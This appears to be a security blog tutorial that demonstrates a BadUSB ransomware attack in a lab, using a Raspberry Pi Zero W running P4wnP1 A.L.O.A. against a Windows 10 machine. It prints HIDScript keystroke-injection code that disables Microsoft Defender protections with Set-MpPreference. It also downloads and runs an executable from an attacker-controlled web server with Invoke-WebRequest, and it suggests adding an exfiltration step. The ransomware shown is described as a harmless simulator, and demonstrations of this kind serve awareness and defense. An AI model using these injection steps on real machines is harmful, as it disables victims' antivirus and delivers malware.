Deploying Ransomware with a Weaponized USB Device

Raspberry Pi Zero W with P4wnP1 A.L.O.A.

What is a Ransomware Attack?

Ransomware is a type of malware attack that encrypts a victim’s data and prevents access until a ransom payment is made. CryptoLocker, Colonial Pipeline, NotPetya, REvil, and Ryuk are all names associated with ransomware that have raised our awareness about the dangers of ransomware.

According to a 2021 FBI report, cybercrime groups have “sent malicious USB devices to US companies over the past few months in the hopes of infecting their systems with malware and carrying out future attacks.” Arriving in packages through the USPS, hiding behind COVID guidelines from health agencies, or in an Amazon box with a fake gift card and rewards letter, these USB devices execute a BadUSB attack downloading malware, ransomware, and installing backdoors.

We’ve all heard the warnings about picking up a random USB device and plugging it into our computers to see what is on there. But seriously, what can happen? We’ll walk through a possible ransomware scenario that takes less than two minutes on our Windows 10 computer. This is a simple example, but this vulnerability exists for home users and local businesses where a single computer could hold all the user's important data.

P4wnP1 A.L.O.A

The P4wnP1 A.L.O.A. (A Little Offensive Security) is a framework for the Raspberry Pi Zero W that allows you to plug a flexible platform for pentesting and physical attacks into a host computer. Once connected the low-cost P4wnP1 A.L.O.A is recognized as a USB human interface device (HID). Computers trust USB devices because they mimic keyboards or mice. Once connected, this virtual keyboard can inject keystrokes into the unsuspecting users’ computer and discreetly execute harmful commands or inject malicious payloads.

This malicious USB attack exposes vulnerabilities associated with the implicit trust Windows gives to USB devices by completely bypassing firewalls and network monitoring. Short of physically securing or disabling your USB ports, there is little defense to this type of attack.

Lab Environment

  • Our victim computer: Windows 10 with Microsoft Defender Antivirus real-time protection enabled with all updates and patches applied.
  • Our attacking system: Kali Linux
  • Raspberry Pi Zero W running P4wnP1 A.L.O.A.

The attack begins by plugging the P4wnP1 into an open USB on the victim’s computer.

Kali Linux Attacking Computer

Our Kali Linux computer has a web directory where we keep all of our malware for easy deployment. CashCat.exe is the ‘ransomware’ that will encrypt all of our files. CashCat.exe is a harmless ransomware simulator that renames txt files with a ransomware extension and does not encrypt any files. This is a fun demonstration of a ransomware attack on a vulnerable system.

From our web directory, run the python3 -m http.server 80 command to serve up our payload when the victim’s Powershell asks for it.

First, we need to connect to the P4wnP1’s access point, access the configuration page, make some changes, and execute the attack.

Launch a web browser and head over to: http://172.24.0.1:8000. This is the P4wnP1 A.L.O.A. main configuration window.

On the HIDSCRIPT tab, select LOAD & REPLACE

Locate and select Cashcat.js and click OK.

The contents of the Cashcat.js script are loaded into the main HIDSCRIPT window, click RUN to execute the malware.

Executing the Cashcat.js payload launches the attack on the victim’s computer. At this point, the hacker is done with this attack.

What’s Happening on the Victim’s Computer

On the victim’s Windows 10 computer the attack is just beginning. The following code snippet does the work of disabling Microsoft Defender, Virus & Threat Protection, and Ransomware.

type(‘powershell’);
delay(200);
press(‘ENTER’)
delay(200)
type(‘Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend’);

If a user is watching their monitor, they will see Window’s Security windows briefly pop up and then go away. The attacker is betting on the computer being unattended or having a distracted user. However, even if the user is aware of what is happening, the attack is so quick that the damage is already done before the user can react.

Virus and Threat Protection
Ransomware Protection

After disabling all of Windows defenses, Powershell moves into a directory containing important files, connects to the Kali web server, downloads the Ransomware, and encrypts the files in the directory.

type(‘cd ../accounting_files’);
press(‘ENTER’)
type(‘Invoke-WebRequest http://192.168.1.183/apps/CashCat.exe -OutFile “CashCat.exe”’)
delay(100)
press(‘ENTER’)
delay(500)
press(‘ENTER’)
delay(400)
type(“./CashCat.exe -e cmd.exe”)

In a typical ransomware attack, the hackers have been in the system for some time to know where important files are located. Data exfiltration would be their first exploit and this script could be modified to upload the files to our web server before deploying the ransomware.

The final act of this attack is displaying the ransomware note for payment.

Walkthrough Video